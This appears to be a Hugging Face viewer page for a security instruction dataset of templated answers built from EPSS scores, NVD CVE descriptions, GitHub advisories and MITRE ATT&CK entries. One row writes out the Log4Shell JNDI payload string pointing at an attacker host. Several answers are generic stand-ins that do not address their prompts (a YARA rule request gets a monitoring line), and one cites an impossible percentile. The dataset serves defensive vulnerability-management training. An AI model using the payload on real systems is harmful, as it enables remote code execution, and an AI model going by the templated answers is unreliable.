Dataset Viewer
Auto-converted to Parquet Duplicate
instruction
stringlengths
15
154
response
stringlengths
79
3.82k
source
stringclasses
111 values
confidence
float64
1
1
Evaluate CVE-2003-0102 exploit risk for vulnerability management.
**CVE-2003-0102** EPSS: 8.278% | Percentile: 92.1% Likelihood: Moderate Source: FIRST.org EPSS
epss_v9
1
What remediation timeline should I set for CVE-2022-30935?
**CVE-2022-30935** EPSS: 1.507% | Percentile: 81.0% Timeline: 30d Source: FIRST.org
epss_v12
1
Security advisory for CVE-2017-11539.
**CVE-2017-11539** EPSS: 0.3800% | Percentile: 59.1% Risk: LOW SLA: 90d Source: FIRST.org
epss_v15
1
Automated triage decision for CVE-2025-6979.
**CVE-2025-6979** EPSS: 0.1070% | Percentile: 28.8% Risk: LOW Source: FIRST.org
epss_v18
1
Automated triage decision for CVE-2012-1666.
**CVE-2012-1666** EPSS: 0.1960% | Percentile: 41.4% Risk: LOW Source: FIRST.org
epss_v18
1
Risk-based patching for CVE-2021-36184.
**CVE-2021-36184** EPSS: 0.3080% | Percentile: 53.6% Risk: LOW Action: Monitor Source: FIRST.org
epss_v16
1
Incident preparation for CVE-2025-25514.
**CVE-2025-25514** EPSS: 0.1020% | Percentile: 27.9% Risk: LOW Source: FIRST.org
epss_v18
1
Calculate risk-based priority for CVE-2006-4217.
**CVE-2006-4217** EPSS: 1.605% | Percentile: 81.5% Timeline: 30d Source: FIRST.org
epss_v12
1
Blue team response to CVE-2008-1064.
**CVE-2008-1064** EPSS: 0.2250% | Percentile: 45.0% Threat Level: LOW Detection: Monitor for exploitation indicators related to this CVE. Source: FIRST.org
epss_v17
1
Patch priority analysis for CVE-2022-29049.
**CVE-2022-29049** EPSS: 1.280% | Percentile: 79.4% Priority: MEDIUM SLA: 30 days Source: FIRST.org
epss_v13
1
Risk score calculation for CVE-2022-41242.
**CVE-2022-41242** EPSS: 0.3960% | Percentile: 60.0% Risk: LOW SLA: 90d Source: FIRST.org
epss_v15
1
Vulnerability intelligence: CVE-2021-28313.
**CVE-2021-28313** EPSS: 0.5080% | Percentile: 66.0% Risk: LOW SLA: 90d Source: FIRST.org
epss_v15
1
Vulnerability triage: CVE-2005-3513.
**CVE-2005-3513** EPSS: 0.3460% | Percentile: 56.9% Risk: LOW Action: Monitor Source: FIRST.org
epss_v16
1
Vulnerability intelligence: CVE-2018-3890.
**CVE-2018-3890** EPSS: 0.4920% | Percentile: 65.3% Risk: LOW SLA: 90d Source: FIRST.org
epss_v15
1
What mitigations exist for CVE-2010-4198 besides patching?
**Mitigations for CVE-2010-4198** (HIGH, CVSS 8.8) WebKit, as used in Google Chrome before 7.0.517.44, webkitgtk before 1.2.6, and other products, does not properly handle large text areas, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted HTML document. **Beyond patching:** 1. Network segmentation to limit exposure 2. WAF/IPS rules for known exploitation patterns 3. Disable affected feature/service if non-essential 4. Enhanced monitoring and logging 5. Access control restrictions Source: NVD
nvd_diverse_v5
1
Generate a patch priority report for CVE-2013-4862.
**CVE-2013-4862** EPSS: 7.944% | Percentile: 91.9% Likelihood: Moderate Source: FIRST.org EPSS
epss_v9
1
Analyze exploit risk for CVE-2016-3594 using EPSS data.
**CVE-2016-3594** EPSS: 1.847% | Percentile: 82.8% Timeline: 30d Source: FIRST.org
epss_v12
1
Patch management decision for CVE-2022-20683.
**CVE-2022-20683** EPSS: 0.570% | Percentile: 68.3% Risk: LOW Action: Backlog Source: FIRST.org EPSS
epss_v14
1
Patch management decision for CVE-2013-2178.
**CVE-2013-2178** EPSS: 0.828% | Percentile: 74.3% Risk: LOW Action: Backlog Source: FIRST.org EPSS
epss_v14
1
Recommend a monitoring strategy for CVE-2016-3068.
**Monitoring Strategy: CVE-2016-3068** (HIGH, CVSS 8.8) Mercurial before 3.7.3 allows remote attackers to execute arbitrary code via a crafted git ext:: URL when cloning a subrepository. **Detection:** 1. Vulnerability scan for affected versions 2. Network signatures for exploitation attempts 3. Log analysis for post-exploitation indicators 4. File integrity monitoring on affected components Source: NVD
nvd_diverse_v7
1
What mitigations exist for CVE-2016-1175 besides patching?
**Mitigations for CVE-2016-1175** (MEDIUM, CVSS 4.3) Cross-site request forgery (CSRF) vulnerability in AQUOS Photo Player HN-PP150 1.02.00.04 through 1.03.01.04 allows remote attackers to hijack the authentication of arbitrary users. **Beyond patching:** 1. Network segmentation to limit exposure 2. WAF/IPS rules for known exploitation patterns 3. Disable affected feature/service if non-essential 4. Enhanced monitoring and logging 5. Access control restrictions Source: NVD
nvd_diverse_v5
1
Generate a vulnerability report for GHSA-rgq9-fqf5-fv58.
**GHSA-rgq9-fqf5-fv58** (CVE-2026-3059) Severity: CRITICAL | Ecosystem: pip SGLang's multimodal generation module is vulnerable to unauthenticated remote code execution through the ZMQ broker SGLang's multimodal generation module is vulnerable to unauthenticated remote code execution through the ZMQ broker, which deserializes untrusted data using pickle.loads() without authentication. Remediation: Update to patched version. Check vendor advisory.
github_advisory_v3
1
Assess exploitation risk for CVE-2020-10221 using EPSS.
**CVE-2020-10221** — EPSS Risk Assessment Exploit Probability: **91.4%** (30-day) Percentile: 99.7% Risk Level: HIGH Source: FIRST.org EPSS
epss_scores_v3
1
Analyze exploit risk for CVE-2005-1326 using EPSS data.
**CVE-2005-1326** EPSS: 1.580% | Percentile: 81.4% Timeline: 30d Source: FIRST.org
epss_v12
1
Vulnerability intelligence report: CVE-2022-4234.
**CVE-2022-4234** EPSS: 0.2110% | Percentile: 43.4% Threat Level: LOW Detection: Monitor for exploitation indicators related to this CVE. Source: FIRST.org
epss_v17
1
Vulnerability lifecycle tracking: CVE-2026-20068.
**CVE-2026-20068** EPSS: 0.1030% | Percentile: 28.2% Risk: LOW Source: FIRST.org
epss_v18
1
What is the exploitation probability for CVE-2020-15505?
**CVE-2020-15505** — EPSS Analysis Exploit Probability: **94.4%** (within 30 days) Percentile: 100.0% (higher than 100% of all CVEs) ⚠️ HIGH exploitation probability — prioritize patching! EPSS (Exploit Prediction Scoring System) by FIRST.org provides a data-driven estimate of exploitation likelihood. Source: https://api.first.org/data/v1/epss?cve=CVE-2020-15505
epss_scores
1
Incident preparation for CVE-2022-29437.
**CVE-2022-29437** EPSS: 0.1090% | Percentile: 29.2% Risk: LOW Source: FIRST.org
epss_v18
1
Generate a vulnerability report for GHSA-rvv3-g6hj-g44x.
**GHSA-rvv3-g6hj-g44x** (None) Severity: HIGH | Ecosystem: nuget AutoMapper Vulnerable to Denial of Service (DoS) via Uncontrolled Recursion ### Summary AutoMapper is vulnerable to a Denial of Service (DoS) attack. When mapping deeply nested object graphs, the library uses recursive method calls without enforcing a default maximum depth limit. This allows an attacker to provide a specially crafted object graph that exhausts the thread's Remediation: Update to patched version. Check vendor advisory.
github_advisory_v3
1
What remediation timeline should I set for CVE-2004-2510?
**CVE-2004-2510** EPSS: 1.604% | Percentile: 81.5% Timeline: 30d Source: FIRST.org
epss_v12
1
Security advisory for CVE-2007-1236.
**CVE-2007-1236** EPSS: 0.3770% | Percentile: 58.9% Risk: LOW SLA: 90d Source: FIRST.org
epss_v15
1
Write a security advisory for CVE-2016-9402.
**Security Advisory: CVE-2016-9402** Severity: CRITICAL (CVSS 9.8) **Summary:** SQL injection vulnerability in the moderation tool in MyBB (aka MyBulletinBoard) before 1.8.7 and MyBB Merge System before 1.8.7 might allow remote attackers to execute arbitrary SQL commands via unspecified vectors. **Affected:** Check vendor advisory **Action Required:** Apply patches. If unavailable, implement compensating controls. **References:** https://nvd.nist.gov/vuln/detail/CVE-2016-9402
nvd_rephrase_v3
1
Generate a patch priority report for CVE-2006-6850.
**CVE-2006-6850** EPSS: 5.926% | Percentile: 90.5% Likelihood: Moderate Source: FIRST.org EPSS
epss_v9
1
Tell me about CVE-2022-37599 affecting webpack.
**CVE-2022-37599** (CVSS 7.5) Related: webpack A Regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils 2.0.0 via the resourcePath variable in interpolateName.js. Source: https://nvd.nist.gov/vuln/detail/CVE-2022-37599
nvd_infra_keyword
1
Should my team focus on CVE-2017-1000073 this sprint?
**CVE-2017-1000073** EPSS: 3.269% | Percentile: 87.0% Priority: P3-Medium Recommendation: Schedule in next cycle Source: FIRST.org EPSS
epss_v10
1
Log analysis indicators for CVE-2020-13617.
**CVE-2020-13617** EPSS: 0.2520% | Percentile: 48.2% Threat Level: LOW Detection: Monitor for exploitation indicators related to this CVE. Source: FIRST.org
epss_v17
1
Remediation guidance for CVE-2001-1357.
**CVE-2001-1357** EPSS: 0.4670% | Percentile: 64.1% Risk: LOW SLA: 90d Source: FIRST.org
epss_v15
1
Write a YARA hunting rule concept for CVE-2021-25102.
**CVE-2021-25102** EPSS: 0.2100% | Percentile: 43.3% Threat Level: LOW Detection: Monitor for exploitation indicators related to this CVE. Source: FIRST.org
epss_v17
1
Vulnerability intelligence: CVE-2006-3071.
**CVE-2006-3071** EPSS: 0.5270% | Percentile: 66.8% Risk: LOW SLA: 90d Source: FIRST.org
epss_v15
1
Security operations update: CVE-2013-3032.
**CVE-2013-3032** EPSS: 0.2660% | Percentile: 49.9% Risk: LOW Action: Monitor Source: FIRST.org
epss_v16
1
Compliance risk from CVE-2019-15411.
**CVE-2019-15411** EPSS: 0.1020% | Percentile: 27.9% Risk: LOW Source: FIRST.org
epss_v18
1
How should I prioritize patching CVE-2015-8785?
**CVE-2015-8785** (CVSS 6.2, MEDIUM) The fuse_fill_write_pages function in fs/fuse/file.c in the Linux kernel before 4.4 allows local users to cause a denial of service (infinite loop) via a writev system call that triggers a zero length for the first segment of an iov. Patching Priority: MEDIUM Source: https://nvd.nist.gov/vuln/detail/CVE-2015-8785
nvd_multi_format
1
Vulnerability prioritization for CVE-2015-9019.
**CVE-2015-9019** EPSS: 0.595% | Percentile: 69.0% Risk: LOW Action: Backlog Source: FIRST.org EPSS
epss_v14
1
Security operations update: CVE-2025-10171.
**CVE-2025-10171** EPSS: 0.2850% | Percentile: 51.7% Risk: LOW Action: Monitor Source: FIRST.org
epss_v16
1
Explain the MITRE ATT&CK technique T1204.004 (Malicious Copy and Paste).
**T1204.004: Malicious Copy and Paste** An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). One such strategy is "ClickFix," in which adversaries present users with seemingly helpful solutions—such as prompts to fix errors or complete CAPTCHAs—that instead instruct the user to copy and paste malicious code. Malicious websites, Platforms: Linux, macOS, Windows
mitre_attack
1
How urgent is CVE-2017-7084?
**CVE-2017-7084** — Urgency: LOW — routine maintenance CVSS: 3.7 (LOW) An issue was discovered in certain Apple products. macOS before 10.13 is affected. The issue involves the "Application Firewall" component. It allows remote attackers to bypass intended settings in opportunistic circumstances by leveraging incorrect handling of a denied setting after an upgrade. Source: NVD
nvd_diverse_v4
1
Vulnerability lifecycle tracking: CVE-2024-28244.
**CVE-2024-28244** EPSS: 0.1790% | Percentile: 39.2% Risk: LOW Source: FIRST.org
epss_v18
1
How would a SOC analyst triage CVE-2016-9684?
**SOC Triage: CVE-2016-9684** (CRITICAL, CVSS 9.8) Priority: P1 - Immediate The SonicWall Secure Remote Access server (version 8.1.0.2-14sv) is vulnerable to a Remote Command Injection vulnerability in its web administrative interface. This vulnerability occurs in the 'viewcert' CGI (/cgi-bin/viewcert) component responsible for processing SSL certificate information. The CG **Triage steps:** 1. Check asset inventory — is affected software present? 2. Check CISA KEV — actively exploited? 3. Check EPSS — exploitation probability? 4. Assess exposure — internet-facing? 5. Assign to remediation team Source: NVD
nvd_soc_format
1
Create a remediation plan for CVE-2002-1924.
**CVE-2002-1924** EPSS: 0.627% | Percentile: 69.9% Risk: LOW Action: Backlog Source: FIRST.org EPSS
epss_v14
1
What remediation timeline should I set for CVE-2022-25643?
**CVE-2022-25643** EPSS: 1.674% | Percentile: 81.9% Timeline: 30d Source: FIRST.org
epss_v12
1
Log analysis indicators for CVE-2018-18553.
**CVE-2018-18553** EPSS: 0.2400% | Percentile: 47.0% Threat Level: LOW Detection: Monitor for exploitation indicators related to this CVE. Source: FIRST.org
epss_v17
1
Blue team response to CVE-2020-13352.
**CVE-2020-13352** EPSS: 0.2370% | Percentile: 46.5% Threat Level: LOW Detection: Monitor for exploitation indicators related to this CVE. Source: FIRST.org
epss_v17
1
Remediation guidance for CVE-2021-26923.
**CVE-2021-26923** EPSS: 0.5440% | Percentile: 67.4% Risk: LOW SLA: 90d Source: FIRST.org
epss_v15
1
Blue team response to CVE-2018-10208.
**CVE-2018-10208** EPSS: 0.2400% | Percentile: 47.0% Threat Level: LOW Detection: Monitor for exploitation indicators related to this CVE. Source: FIRST.org
epss_v17
1
Tell me about CVE-2024-4173 affecting kafka.
**CVE-2024-4173** (CVSS 7.6) Related: kafka A vulnerability in Brocade SANnav exposes Kafka in the wan interface. The vulnerability could allow an unauthenticated attacker to perform various attacks, including DOS against the Brocade SANnav. Source: https://nvd.nist.gov/vuln/detail/CVE-2024-4173
nvd_infra_keyword
1
Describe CVE-2016-0756 and its impact.
CVE-2016-0756 (MEDIUM, CVSS 5.3): The generate_dialback function in the mod_dialback module in Prosody before 0.9.10 does not properly separate fields when generating dialback keys, which allows remote attackers to spoof XMPP network domains via a crafted stream id and domain name that is included in the target domain as a suffix. Weaknesses: CWE-20 Recommendation: Review affected components and apply patches during next maintenance window.
nvd_cve_medium
1
Remediation guidance for CVE-2008-6807.
**CVE-2008-6807** EPSS: 0.4950% | Percentile: 65.4% Risk: LOW SLA: 90d Source: FIRST.org
epss_v15
1
Vulnerability triage: CVE-2019-5998.
**CVE-2019-5998** EPSS: 0.3260% | Percentile: 55.2% Risk: LOW Action: Monitor Source: FIRST.org
epss_v16
1
Evaluate CVE-2018-0923 exploit risk for vulnerability management.
**CVE-2018-0923** EPSS: 9.924% | Percentile: 92.9% Likelihood: Moderate Source: FIRST.org EPSS
epss_v9
1
What does the EPSS model say about CVE-2020-28038?
**CVE-2020-28038** — EPSS Risk Priority Exploit Probability: 16.023% Percentile: 94.7% Priority: High - schedule within sprint Source: FIRST.org EPSS
epss_v8
1
Automated triage decision for CVE-2019-2170.
**CVE-2019-2170** EPSS: 0.1250% | Percentile: 31.6% Risk: LOW Source: FIRST.org
epss_v18
1
Exploit likelihood of CVE-2009-4989.
**CVE-2009-4989** EPSS: 1.188% | Percentile: 78.6% Priority: MEDIUM SLA: 30 days Source: FIRST.org
epss_v13
1
What vulnerability is CVE-2016-0706?
**CVE-2016-0706** (MEDIUM, CVSS 4.3): Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 does not place org.apache.catalina.manager.StatusManagerServlet on the org/apache/catalina/core/RestrictedServlets.properties list, which allows remote authenticated users to bypass intended SecurityManager restrictions and read arbitrary HTTP requests, a Source: NVD
nvd_rephrase
1
Vulnerability intelligence: CVE-2021-24323.
**CVE-2021-24323** EPSS: 0.3770% | Percentile: 58.8% Risk: LOW SLA: 90d Source: FIRST.org
epss_v15
1
Provide EPSS-based vulnerability prioritization for CVE-2018-0806.
**CVE-2018-0806** — EPSS Prioritization Exploit Probability: 36.40% | Percentile: 97.1% Priority: P2-High Source: FIRST.org EPSS
epss_v7
1
Should CVE-2001-1125 be on my radar?
**CVE-2001-1125** (CRITICAL, CVSS 9.8) Symantec LiveUpdate before 1.6 does not use cryptography to ensure the integrity of download files, which allows remote attackers to execute arbitrary code via DNS spoofing of the update.symantec.com site. Yes — Critical severity, immediate attention needed. Source: NVD
nvd_diverse_v4
1
Patch priority analysis for CVE-2019-12750.
**CVE-2019-12750** EPSS: 1.457% | Percentile: 80.6% Priority: MEDIUM SLA: 30 days Source: FIRST.org
epss_v13
1
Threat assessment: CVE-2006-1295.
**CVE-2006-1295** EPSS: 0.4270% | Percentile: 62.0% Risk: LOW SLA: 90d Source: FIRST.org
epss_v15
1
Compliance risk from CVE-2021-3607.
**CVE-2021-3607** EPSS: 0.1730% | Percentile: 38.4% Risk: LOW Source: FIRST.org
epss_v18
1
Detection engineering for CVE-2022-23054.
**CVE-2022-23054** EPSS: 0.2400% | Percentile: 47.0% Threat Level: LOW Detection: Monitor for exploitation indicators related to this CVE. Source: FIRST.org
epss_v17
1
Analyze exploit risk for CVE-2024-26071 using EPSS data.
**CVE-2024-26071** EPSS: 1.781% | Percentile: 82.5% Timeline: 30d Source: FIRST.org
epss_v12
1
Assess the severity of CVE-2017-2096 and recommend priority level for patching.
Severity Assessment for CVE-2017-2096: - CVSS Score: 9.8 - Severity: CRITICAL - Related Weaknesses: CWE-78 IMMEDIATE patching required. Note: This assessment is based on the CVSS base score. Adjust priority based on your environment's exposure and asset criticality.
nvd_cve
1
How does CVE-2008-7109 affect my infrastructure?
**CVE-2008-7109** (CRITICAL, CVSS 9.8) The Scanner File Utility (aka listener) in Kyocera Mita (KM) 3.3.0.1 allows remote attackers to bypass authorization and upload arbitrary files to the client system via a modified program that does not prompt the user for a password. **Impact Assessment:** - Severity: CRITICAL - Check if affected software is in your asset inventory - Prioritize based on exposure and business criticality Source: NVD
nvd_diverse_qa
1
What remediation steps should I take for CVE-2015-8672?
**CVE-2015-8672** (MEDIUM, CVSS 5.3) The presentation transmission permission management mechanism in Huawei TE30, TE40, TE50, and TE60 multimedia video conferencing endpoints with software before V100R001C10SPC100 allows remote attackers to cause a denial of service (wired presentation outage) via unspecified vectors involving a wireless presentation. **Remediation:** 1. Apply vendor patch immediately 2. If no patch: isolate affected systems 3. Monitor for exploitation indicators 4. Check CISA KEV for active exploitation status Source: NVD
nvd_diverse_qa
1
Create a remediation plan for CVE-2018-3232.
**CVE-2018-3232** EPSS: 0.786% | Percentile: 73.5% Risk: LOW Action: Backlog Source: FIRST.org EPSS
epss_v14
1
Threat assessment: CVE-2020-35872.
**CVE-2020-35872** EPSS: 0.4330% | Percentile: 62.5% Risk: LOW SLA: 90d Source: FIRST.org
epss_v15
1
Tell me about CVE-2015-4152 affecting elasticsearch.
**CVE-2015-4152** (CVSS 0.0) Related: elasticsearch Directory traversal vulnerability in the file output plugin in Elasticsearch Logstash before 1.4.3 allows remote attackers to write to arbitrary files via vectors related to dynamic field references in the path option. Source: https://nvd.nist.gov/vuln/detail/CVE-2015-4152
nvd_infra_keyword
1
What remediation timeline should I set for CVE-2025-24993?
**CVE-2025-24993** EPSS: 1.475% | Percentile: 80.8% Timeline: 30d Source: FIRST.org
epss_v12
1
What is CVE-2016-5066? Provide severity, description, and mitigation advice.
CVE-2016-5066 is a CRITICAL severity vulnerability (CVSS: 9.8). Description: Sierra Wireless GX 440 devices with ALEOS firmware 4.3.2 have weak passwords for admin, rauser, sconsole, and user. Weaknesses: CWE-255 Mitigation: Apply vendor patches immediately. Monitor for exploitation indicators. Review affected systems and apply compensating controls.
nvd_cve
1
Threat assessment: CVE-2023-30945.
**CVE-2023-30945** EPSS: 0.4340% | Percentile: 62.5% Risk: LOW SLA: 90d Source: FIRST.org
epss_v15
1
Risk score calculation for CVE-2018-16472.
**CVE-2018-16472** EPSS: 0.5190% | Percentile: 66.5% Risk: LOW SLA: 90d Source: FIRST.org
epss_v15
1
Security posture assessment for CVE-2006-5751.
**CVE-2006-5751** EPSS: 0.1010% | Percentile: 27.7% Risk: LOW Source: FIRST.org
epss_v18
1
Evaluate CVE-2006-4993 exploit risk for vulnerability management.
**CVE-2006-4993** EPSS: 6.509% | Percentile: 91.0% Likelihood: Moderate Source: FIRST.org EPSS
epss_v9
1
Analyze exploit risk for CVE-2007-4213 using EPSS data.
**CVE-2007-4213** EPSS: 1.832% | Percentile: 82.7% Timeline: 30d Source: FIRST.org
epss_v12
1
Exploit likelihood of CVE-2021-43081.
**CVE-2021-43081** EPSS: 0.917% | Percentile: 75.7% Priority: LOW SLA: 90 days Source: FIRST.org
epss_v13
1
Evaluate CVE-2007-2791 exploit risk for vulnerability management.
**CVE-2007-2791** EPSS: 6.921% | Percentile: 91.3% Likelihood: Moderate Source: FIRST.org EPSS
epss_v9
1
Vulnerability triage: CVE-2021-36747.
**CVE-2021-36747** EPSS: 0.3680% | Percentile: 58.3% Risk: LOW Action: Monitor Source: FIRST.org
epss_v16
1
Provide a brief security assessment of CVE-2016-4543.
**Security Assessment: CVE-2016-4543** CVSS: 9.8 (CRITICAL) The exif_process_IFD_in_JPEG function in ext/exif/exif.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 does not validate IFD sizes, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data. Risk: CRITICAL — Immediate action required Source: NVD
nvd_diverse_qa
1
Explain CVE-2016-0184 — a use after free vulnerability.
**CVE-2016-0184** (CVSS 8.8, HIGH) Type: use after free Use-after-free vulnerability in GDI in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows remote attackers to execute arbitrary code via a crafted document, aka "Direct3D Use After Free Vulnerability." Source: https://nvd.nist.gov/vuln/detail/CVE-2016-0184
nvd_vuln_type_v2
1
Security posture assessment for CVE-2016-4884.
**CVE-2016-4884** EPSS: 0.1170% | Percentile: 30.3% Risk: LOW Source: FIRST.org
epss_v18
1
Vulnerability lifecycle tracking: CVE-2024-10120.
**CVE-2024-10120** EPSS: 0.1450% | Percentile: 34.5% Risk: LOW Source: FIRST.org
epss_v18
1
Explain CVE-2014-9926 — a use after free vulnerability.
**CVE-2014-9926** (CVSS 7.8, HIGH) Type: use after free In GNSS in all Android releases from CAF using the Linux kernel, a Use After Free vulnerability could potentially exist. Source: https://nvd.nist.gov/vuln/detail/CVE-2014-9926
nvd_vuln_type_v2
1
Remediation guidance for CVE-2001-0866.
**CVE-2001-0866** EPSS: 0.4470% | Percentile: 63.2% Risk: LOW SLA: 90d Source: FIRST.org
epss_v15
1
Assess the risk of CVE-2015-8268 for an enterprise environment.
Risk Assessment: CVE-2015-8268 - CVSS: 7.5 (HIGH) - Weaknesses: CWE-200 Schedule patching in next maintenance window. Consider: asset exposure, compensating controls, exploit availability (check EPSS scores).
nvd_cve_high
1
Security posture assessment for CVE-2019-3718.
**CVE-2019-3718** EPSS: 0.1560% | Percentile: 36.1% Risk: LOW Source: FIRST.org
epss_v18
1
Generate a patch priority report for CVE-2002-1745.
**CVE-2002-1745** EPSS: 10.167% | Percentile: 93.0% Likelihood: High Source: FIRST.org EPSS
epss_v9
1
EPSS-based risk assessment: CVE-2013-2878.
**CVE-2013-2878** EPSS: 0.734% | Percentile: 72.5% Risk: LOW Action: Backlog Source: FIRST.org EPSS
epss_v14
1
Cyber risk quantification: CVE-2017-16942.
**CVE-2017-16942** EPSS: 0.2840% | Percentile: 51.5% Risk: LOW Action: Monitor Source: FIRST.org
epss_v16
1
Provide EPSS-based vulnerability prioritization for CVE-2015-2305.
**CVE-2015-2305** — EPSS Prioritization Exploit Probability: 31.02% | Percentile: 96.7% Priority: P2-High Source: FIRST.org EPSS
epss_v7
1
What is the exact exploit code for CVE-2021-44228?
While I know that CVE-2021-44228 (Log4Shell) involves JNDI lookup injection in Log4j, I should be transparent about my limitations: **What I know with HIGH confidence:** - The vulnerability allows RCE via `${jndi:ldap://attacker/payload}` strings logged by Log4j 2.0-beta9 to 2.14.1 - CVSS 10.0, affects nearly all Java applications using Log4j - Patched in Log4j 2.17.1+ **What I'm LESS confident about:** - Specific exploit code details — these change rapidly and vary by target - I won't provide ready-to-use exploit code **For exploit details (authorized testing only):** - Check ExploitDB (https://www.exploit-db.com/) - GitHub PoC repositories (verify legitimacy) - Use tools like log4j-scan for authorized testing ⚠️ Using exploit code without authorization is illegal in most jurisdictions.
anti_hallucination_calibration
1
End of preview. Expand in Data Studio

🛡️ Ordinal Security Dataset

Training dataset for Ordinal LLM — a security-specialized language model.

Dataset Description

17,000 instruction/response pairs covering cybersecurity topics. All data sourced from verified public databases (no synthetic data).

Sources

Source Count
nvd_cve 4,000
nvd_cve_high 4,000
github_advisory_expanded 1,200
nvd_cve_medium 1,000
nvd_keyword 850
mitre_attack 835
mitre_software 785
capec 613
github_advisory 500
nvd_cve_diverse 500
cisa_kev 500
nvd_cve_low 500
capec_defense 488
anti_hallucination 444
nvd_cve_followup 300
mitre_groups 185
nvd_vuln_type 150
expert_security_qa 43
anti_hallucination_refusal 40
cwe 20
security_best_practices 14
dpo_chosen 12
anti_hallucination_calibration 7
anti_hallucination_correction 6
tool_guides 3
incident_response_qa 3
anti_hallucination_citation 2

Splits

Split Count
Train 16,150
Test 850

Usage

from datasets import load_dataset
dataset = load_dataset("KaztoRay/ordinal-security-dataset")
Downloads last month
4